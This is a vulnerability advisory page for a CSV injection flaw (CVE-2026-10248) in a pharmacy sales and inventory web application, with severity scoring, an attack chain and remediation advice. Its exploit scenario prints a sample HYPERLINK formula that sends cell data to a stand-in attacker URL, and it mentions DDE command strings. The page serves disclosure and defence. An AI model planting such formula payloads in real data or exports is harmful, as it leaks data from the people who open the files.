
Pharmacy Sales and Inventory System EUVD-2026-33623

CVE-2026-10248 (LOW)
Improper Neutralization of Formula Elements in a CSV File (CWE-1236)
2026-06-01 · VulDB · GHSA-hpq4-4cqf-mcg8
Score 2.0 · CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: High
User Interaction: None
Vulnerable System Impact: Confidentiality Low, Integrity Low, Availability Low
Subsequent System Impact: None
Exploit Maturity: Proof-of-Concept
(CVSS 4.0 has no Scope metric; scope is expressed through the Subsequent System metrics SC/SI/SA above.)

Lifecycle Timeline

Severity Changed: Jun 01, 2026 11:22 (NVD): MEDIUM to LOW
CVSS Changed: Jun 01, 2026 11:22 (NVD): 4.7 (MEDIUM) to 2.0 (LOW)
Analysis Generated: Jun 01, 2026 11:22 (vuln.today)

Description (CVE.org)

A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes CSV injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.

Analysis (AI)

CSV injection in SourceCodester Pharmacy Sales and Inventory System 1.0 lets a high-privileged remote attacker store spreadsheet formula payloads in the Address and Company Name fields of the Supplier Creation Interface; the export at /Export_csv/export then writes those values to the CSV file without neutralizing them. When downstream staff open the export in a spreadsheet application such as Microsoft Excel or LibreOffice Calc, the application evaluates the injected formulas with the privileges of the user who opened the file, enabling information disclosure (for example a HYPERLINK that carries cell contents to an attacker-controlled URL), tampering with the data staff see, or further client-side exploitation. Two caveats matter for triage: the NVD vector scores User Interaction as None, yet the payload only fires when a person opens the export in a spreadsheet, and current Excel and LibreOffice Calc builds prompt before executing DDE links or updating external references, so command execution depends on the victim accepting that warning. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Authenticate to application with high-privilege credentials
Delivery: Navigate to Supplier Creation Interface
Exploit: Inject formula payload into Address or Company Name field
Install: Save malicious supplier record
C2: Victim exports supplier list via /Export_csv/export
Execute: Victim opens CSV in Excel or LibreOffice
Impact: Formula executes on victim workstation

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the attacker to hold a high-privilege account (PR:H per the CVSS vector) on the SourceCodester Pharmacy Sales and Inventory System, specifically one permitted to create or edit supplier records; the flaw cannot be exploited unauthenticated or with low-privilege credentials. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS base score of 4.7 (Medium) referenced here is the earlier NVD value; the timeline above records NVD revising it to 2.0 (Low) on the same day, so treat 4.7 as the pre-revision figure. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: A high-privileged attacker with valid application credentials navigates to the Supplier Creation Interface and creates or edits a supplier record, placing a payload such as =HYPERLINK("http://attacker.com/?data="&A1,"Click") or a DDE command string in the Company Name or Address field. A staff member later exports the supplier list via the /Export_csv/export endpoint and opens the resulting file in Microsoft Excel, which interprets the injected formula and either sends cell data to an attacker-controlled server when the link is followed or, only if DDE server launch is enabled and the user accepts Excel's security prompt, launches a system command. …
Remediation: No vendor-released patch has been identified at the time of analysis, and no patched version is referenced in any available advisory; the CVSS 4.0 vector above carries no remediation-level metric (CVSS 4.0 dropped Remediation Level, and only Exploit Maturity, E:P, is set). Until a fix exists, the standard compensating control is to neutralize exported cells whose first non-space character is =, +, -, @, tab or carriage return by prefixing a single quote and quoting every field, and to audit existing supplier records for such values. … Detailed patch versions, workarounds, and compensating controls in full report.
